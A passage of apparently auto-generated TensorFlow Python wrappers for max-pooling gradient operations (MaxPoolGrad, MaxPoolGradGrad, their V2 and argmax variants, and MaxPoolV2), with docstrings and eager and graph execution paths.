attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPool3DGradGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def max_pool_grad(orig_input, orig_output, grad, ksize, strides, padding, explicit_paddings=[], data_format="NHWC", name=None):
r"""Computes gradients of the maxpooling function.
Args:
orig_input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
The original input tensor.
orig_output: A `Tensor`. Must have the same type as `orig_input`.
The original output tensor.
grad: A `Tensor`. Must have the same type as `orig_input`.
4-D. Gradients w.r.t. the output of `max_pool`.
ksize: A list of `ints` that has length `>= 4`.
The size of the window for each dimension of the input tensor.
strides: A list of `ints` that has length `>= 4`.
The stride of the sliding window for each dimension of the
input tensor.
padding: A `string` from: `"SAME", "VALID", "EXPLICIT"`.
The type of padding algorithm to use.
explicit_paddings: An optional list of `ints`. Defaults to `[]`.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `orig_input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPoolGrad", name, orig_input, orig_output, grad, "ksize",
ksize, "strides", strides, "padding", padding, "explicit_paddings",
explicit_paddings, "data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool_grad_eager_fallback(
orig_input, orig_output, grad, ksize=ksize, strides=strides,
padding=padding, explicit_paddings=explicit_paddings,
data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'max_pool_grad' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPoolGrad", orig_input=orig_input, orig_output=orig_output,
grad=grad, ksize=ksize, strides=strides,
padding=padding, explicit_paddings=explicit_paddings,
data_format=data_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"explicit_paddings", _op.get_attr("explicit_paddings"),
"data_format", _op.get_attr("data_format"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPoolGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
MaxPoolGrad = tf_export("raw_ops.MaxPoolGrad")(_ops.to_raw_op(max_pool_grad))
def max_pool_grad_eager_fallback(orig_input, orig_output, grad, ksize, strides, padding, explicit_paddings, data_format, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'max_pool_grad' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, _inputs_T = _execute.args_to_matching_eager([orig_input, orig_output, grad], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ], _dtypes.float32)
(orig_input, orig_output, grad) = _inputs_T
_inputs_flat = [orig_input, orig_output, grad]
_attrs = ("ksize", ksize, "strides", strides, "padding", padding,
"explicit_paddings", explicit_paddings, "data_format", data_format, "T",
_attr_T)
_result = _execute.execute(b"MaxPoolGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPoolGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def max_pool_grad_grad(orig_input, orig_output, grad, ksize, strides, padding, data_format="NHWC", name=None):
r"""Computes second-order gradients of the maxpooling function.
Args:
orig_input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
The original input tensor.
orig_output: A `Tensor`. Must have the same type as `orig_input`.
The original output tensor.
grad: A `Tensor`. Must have the same type as `orig_input`.
4-D. Gradients of gradients w.r.t. the input of `max_pool`.
ksize: A list of `ints` that has length `>= 4`.
The size of the window for each dimension of the input tensor.
strides: A list of `ints` that has length `>= 4`.
The stride of the sliding window for each dimension of the
input tensor.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `orig_input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPoolGradGrad", name, orig_input, orig_output, grad, "ksize",
ksize, "strides", strides, "padding", padding, "data_format",
data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool_grad_grad_eager_fallback(
orig_input, orig_output, grad, ksize=ksize, strides=strides,
padding=padding, data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool_grad_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool_grad_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPoolGradGrad", orig_input=orig_input, orig_output=orig_output,
grad=grad, ksize=ksize, strides=strides,
padding=padding, data_format=data_format,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"data_format", _op.get_attr("data_format"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPoolGradGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
MaxPoolGradGrad = tf_export("raw_ops.MaxPoolGradGrad")(_ops.to_raw_op(max_pool_grad_grad))
def max_pool_grad_grad_eager_fallback(orig_input, orig_output, grad, ksize, strides, padding, data_format, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool_grad_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool_grad_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, _inputs_T = _execute.args_to_matching_eager([orig_input, orig_output, grad], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(orig_input, orig_output, grad) = _inputs_T
_inputs_flat = [orig_input, orig_output, grad]
_attrs = ("ksize", ksize, "strides", strides, "padding", padding,
"data_format", data_format, "T", _attr_T)
_result = _execute.execute(b"MaxPoolGradGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPoolGradGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def max_pool_grad_grad_v2(orig_input, orig_output, grad, ksize, strides, padding, data_format="NHWC", name=None):
r"""Computes second-order gradients of the maxpooling function.
Args:
orig_input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
The original input tensor.
orig_output: A `Tensor`. Must have the same type as `orig_input`.
The original output tensor.
grad: A `Tensor`. Must have the same type as `orig_input`.
4-D. Gradients of gradients w.r.t. the input of `max_pool`.
ksize: A `Tensor` of type `int32`.
The size of the window for each dimension of the input tensor.
strides: A `Tensor` of type `int32`.
The stride of the sliding window for each dimension of the
input tensor.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `orig_input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPoolGradGradV2", name, orig_input, orig_output, grad, ksize,
strides, "padding", padding, "data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool_grad_grad_v2_eager_fallback(
orig_input, orig_output, grad, ksize, strides, padding=padding,
data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPoolGradGradV2", orig_input=orig_input, orig_output=orig_output,
grad=grad, ksize=ksize, strides=strides,
padding=padding, data_format=data_format,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("padding", _op.get_attr("padding"), "data_format",
_op.get_attr("data_format"), "T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPoolGradGradV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
MaxPoolGradGradV2 = tf_export("raw_ops.MaxPoolGradGradV2")(_ops.to_raw_op(max_pool_grad_grad_v2))
def max_pool_grad_grad_v2_eager_fallback(orig_input, orig_output, grad, ksize, strides, padding, data_format, name, ctx):
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, _inputs_T = _execute.args_to_matching_eager([orig_input, orig_output, grad], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(orig_input, orig_output, grad) = _inputs_T
ksize = _ops.convert_to_tensor(ksize, _dtypes.int32)
strides = _ops.convert_to_tensor(strides, _dtypes.int32)
_inputs_flat = [orig_input, orig_output, grad, ksize, strides]
_attrs = ("padding", padding, "data_format", data_format, "T", _attr_T)
_result = _execute.execute(b"MaxPoolGradGradV2", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPoolGradGradV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def max_pool_grad_grad_with_argmax(input, grad, argmax, ksize, strides, padding, include_batch_in_index=False, name=None):
r"""Computes second-order gradients of the maxpooling function.
Args:
input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
The original input.
grad: A `Tensor`. Must have the same type as `input`.
4-D with shape `[batch, height, width, channels]`. Gradients w.r.t. the
input of `max_pool`.
argmax: A `Tensor`. Must be one of the following types: `int32`, `int64`.
The indices of the maximum values chosen for each output of `max_pool`.
ksize: A list of `ints` that has length `>= 4`.
The size of the window for each dimension of the input tensor.
strides: A list of `ints` that has length `>= 4`.
The stride of the sliding window for each dimension of the
input tensor.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
include_batch_in_index: An optional `bool`. Defaults to `False`.
Whether to include batch dimension in flattened index of `argmax`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPoolGradGradWithArgmax", name, input, grad, argmax, "ksize",
ksize, "strides", strides, "padding", padding,
"include_batch_in_index", include_batch_in_index)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool_grad_grad_with_argmax_eager_fallback(
input, grad, argmax, ksize=ksize, strides=strides, padding=padding,
include_batch_in_index=include_batch_in_index, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool_grad_grad_with_argmax' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool_grad_grad_with_argmax' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if include_batch_in_index is None:
include_batch_in_index = False
include_batch_in_index = _execute.make_bool(include_batch_in_index, "include_batch_in_index")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPoolGradGradWithArgmax", input=input, grad=grad, argmax=argmax,
ksize=ksize, strides=strides,
padding=padding,
include_batch_in_index=include_batch_in_index,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"include_batch_in_index",
_op._get_attr_bool("include_batch_in_index"), "Targmax",
_op._get_attr_type("Targmax"), "T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPoolGradGradWithArgmax", _inputs_flat, _attrs, _result)
_result, = _result
return _result
MaxPoolGradGradWithArgmax = tf_export("raw_ops.MaxPoolGradGradWithArgmax")(_ops.to_raw_op(max_pool_grad_grad_with_argmax))
def max_pool_grad_grad_with_argmax_eager_fallback(input, grad, argmax, ksize, strides, padding, include_batch_in_index, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool_grad_grad_with_argmax' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool_grad_grad_with_argmax' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if include_batch_in_index is None:
include_batch_in_index = False
include_batch_in_index = _execute.make_bool(include_batch_in_index, "include_batch_in_index")
_attr_Targmax, (argmax,) = _execute.args_to_matching_eager([argmax], ctx, [_dtypes.int32, _dtypes.int64, ])
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, grad], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(input, grad) = _inputs_T
_inputs_flat = [input, grad, argmax]
_attrs = ("ksize", ksize, "strides", strides, "padding", padding,
"include_batch_in_index", include_batch_in_index, "Targmax", _attr_Targmax,
"T", _attr_T)
_result = _execute.execute(b"MaxPoolGradGradWithArgmax", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPoolGradGradWithArgmax", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def max_pool_grad_v2(orig_input, orig_output, grad, ksize, strides, padding, data_format="NHWC", name=None):
r"""Computes gradients of the maxpooling function.
Args:
orig_input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
The original input tensor.
orig_output: A `Tensor`. Must have the same type as `orig_input`.
The original output tensor.
grad: A `Tensor`. Must have the same type as `orig_input`.
4-D. Gradients w.r.t. the output of `max_pool`.
ksize: A `Tensor` of type `int32`.
The size of the window for each dimension of the input tensor.
strides: A `Tensor` of type `int32`.
The stride of the sliding window for each dimension of the
input tensor.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `orig_input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPoolGradV2", name, orig_input, orig_output, grad, ksize,
strides, "padding", padding, "data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool_grad_v2_eager_fallback(
orig_input, orig_output, grad, ksize, strides, padding=padding,
data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPoolGradV2", orig_input=orig_input, orig_output=orig_output,
grad=grad, ksize=ksize, strides=strides,
padding=padding, data_format=data_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("padding", _op.get_attr("padding"), "data_format",
_op.get_attr("data_format"), "T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPoolGradV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
MaxPoolGradV2 = tf_export("raw_ops.MaxPoolGradV2")(_ops.to_raw_op(max_pool_grad_v2))
def max_pool_grad_v2_eager_fallback(orig_input, orig_output, grad, ksize, strides, padding, data_format, name, ctx):
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, _inputs_T = _execute.args_to_matching_eager([orig_input, orig_output, grad], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ], _dtypes.float32)
(orig_input, orig_output, grad) = _inputs_T
ksize = _ops.convert_to_tensor(ksize, _dtypes.int32)
strides = _ops.convert_to_tensor(strides, _dtypes.int32)
_inputs_flat = [orig_input, orig_output, grad, ksize, strides]
_attrs = ("padding", padding, "data_format", data_format, "T", _attr_T)
_result = _execute.execute(b"MaxPoolGradV2", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPoolGradV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def max_pool_grad_with_argmax(input, grad, argmax, ksize, strides, padding, include_batch_in_index=False, name=None):
r"""Computes gradients of the maxpooling function.
Args:
input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
The original input.
grad: A `Tensor`. Must have the same type as `input`.
4-D with shape `[batch, height, width, channels]`. Gradients w.r.t. the
output of `max_pool`.
argmax: A `Tensor`. Must be one of the following types: `int32`, `int64`.
The indices of the maximum values chosen for each output of `max_pool`.
ksize: A list of `ints` that has length `>= 4`.
The size of the window for each dimension of the input tensor.
strides: A list of `ints` that has length `>= 4`.
The stride of the sliding window for each dimension of the
input tensor.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
include_batch_in_index: An optional `bool`. Defaults to `False`.
Whether to include batch dimension in flattened index of `argmax`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPoolGradWithArgmax", name, input, grad, argmax, "ksize",
ksize, "strides", strides, "padding", padding,
"include_batch_in_index", include_batch_in_index)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool_grad_with_argmax_eager_fallback(
input, grad, argmax, ksize=ksize, strides=strides, padding=padding,
include_batch_in_index=include_batch_in_index, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool_grad_with_argmax' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool_grad_with_argmax' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if include_batch_in_index is None:
include_batch_in_index = False
include_batch_in_index = _execute.make_bool(include_batch_in_index, "include_batch_in_index")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPoolGradWithArgmax", input=input, grad=grad, argmax=argmax,
ksize=ksize, strides=strides,
padding=padding,
include_batch_in_index=include_batch_in_index,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"include_batch_in_index",
_op._get_attr_bool("include_batch_in_index"), "Targmax",
_op._get_attr_type("Targmax"), "T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPoolGradWithArgmax", _inputs_flat, _attrs, _result)
_result, = _result
return _result
MaxPoolGradWithArgmax = tf_export("raw_ops.MaxPoolGradWithArgmax")(_ops.to_raw_op(max_pool_grad_with_argmax))
def max_pool_grad_with_argmax_eager_fallback(input, grad, argmax, ksize, strides, padding, include_batch_in_index, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool_grad_with_argmax' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool_grad_with_argmax' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if include_batch_in_index is None:
include_batch_in_index = False
include_batch_in_index = _execute.make_bool(include_batch_in_index, "include_batch_in_index")
_attr_Targmax, (argmax,) = _execute.args_to_matching_eager([argmax], ctx, [_dtypes.int32, _dtypes.int64, ])
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, grad], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(input, grad) = _inputs_T
_inputs_flat = [input, grad, argmax]
_attrs = ("ksize", ksize, "strides", strides, "padding", padding,
"include_batch_in_index", include_batch_in_index, "Targmax", _attr_Targmax,
"T", _attr_T)
_result = _execute.execute(b"MaxPoolGradWithArgmax", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPoolGradWithArgmax", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def max_pool_v2(input, ksize, strides, padding, data_format="NHWC", name=None):
r"""Performs max pooling on the input.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`, `int32`, `int64`, `uint8`, `int16`, `int8`, `uint16`, `qint8`.
4-D input to pool over.
ksize: A `Tensor` of type `int32`.
The size of the window for each dimension of the input tensor.
strides: A `Tensor` of type `int32`.
The stride of the sliding window for each dimension of the
input tensor.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NHWC", "NCHW", "NCHW_VECT_C"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPoolV2", name, input, ksize, strides, "padding", padding,
"data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool_v2_eager_fallback(
input, ksize, strides, padding=padding, data_format=data_format,
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPoolV2", input=input, ksize=ksize, strides=strides,
padding=padding, data_format=data_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "padding",
_op.get_attr("padding"), "data_format",
_op.get_attr("data_format"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPoolV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
MaxPoolV2 = tf_export("raw_ops.MaxPoolV2")(_ops.to_raw_op(max_pool_v2))
def max_pool_v2_eager_fallback(input, ksize, strides, padding, data_format, name, ctx):
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.int64, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.uint16, _dtypes.qint8, ], _dtypes.float32)
ksize = _ops.convert_to_tensor(ksize, _dtypes.int32)
strides = _ops.convert_to_tensor(strides, _dtypes.int32)
_inputs_flat = [input, ksize, strides]
_attrs = ("T", _attr_T, "padding", padding, "data_format", data_format)
_result = _execute.execute(b"MaxPoolV2", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPoolV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
_MaxPoolWithArgmaxOutput = collections.namedtuple(
"MaxPoolWithArgmax",
["output", "argmax"])
def max_pool_with_argmax(input, ksize, strides, padding, Targmax=_dtypes.int64, include_batch_in_index=False, name=None):
r"""Performs max pooling on the input and outputs both max values and indices.
The indices in `argmax` are flattened, so that a maximum value at position
`[b, y, x, c]` becomes flattened index:
`(y * width + x) * channels + c` if `include_batch_in_index` is False;
`((b * height + y) * width + x) * channels + c` if `include_batch_in_index` is True.
The indices returned are always in `[0, height) x [0, width)` before flattening,
even if padding is involved and the mathematically correct answer is outside
(either negative or too large). This is a bug, but fixing it is difficult to do
in a safe backwards compatible way, especially due to flattening.
Args:
